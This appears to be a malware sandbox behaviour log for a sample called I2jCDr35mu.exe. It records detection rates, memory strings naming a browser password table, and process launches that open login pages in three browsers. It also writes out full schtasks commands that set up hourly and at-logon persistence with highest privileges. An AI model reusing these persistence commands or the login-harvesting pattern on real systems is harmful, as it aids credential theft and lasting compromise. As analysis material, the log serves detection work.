                          Source: I2jCDr35mu.exe, 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, I2jCDr35mu.exe, 00000000.00000003.2093800693.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3322219545.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000003.2145688572.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3200225200.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000003.2145890043.0000000005190000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2346163083.0000000000351000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000008.00000003.2256368231.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000003.2356250685.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2622415113.0000000000351000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                          Source: I2jCDr35mu.exe, 00000000.00000003.2209264582.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2210367061.0000000005C7A000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2222296386.0000000005C65000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2209414810.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2276915564.0000000001491000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2272286943.0000000006295000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2212771749.0000000001518000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2211562398.000000000151D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2210888173.0000000001518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: I2jCDr35mu.exeReversingLabs: Detection: 39%
                          Source: I2jCDr35mu.exeVirustotal: Detection: 41%
                          Source: I2jCDr35mu.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile read: C:\Users\user\Desktop\I2jCDr35mu.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\I2jCDr35mu.exe C:\Users\user\Desktop\I2jCDr35mu.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                          Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe"
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video
                          Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2060,i,8917249356731724764,4060394153306559308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1968,i,14158324147676388731,1062553766962202569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,9119518786017765982,11408166405058387419,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1976,i,16814294900655359073,9593979145222890954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video --attempting-deelevation
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe"
                          Source: unknownProcess created: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                          Source: unknownProcess created: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHESTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHESTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2060,i,8917249356731724764,4060394153306559308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1968,i,14158324147676388731,1062553766962202569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,9119518786017765982,11408166405058387419,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1976,i,16814294900655359073,9593979145222890954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3
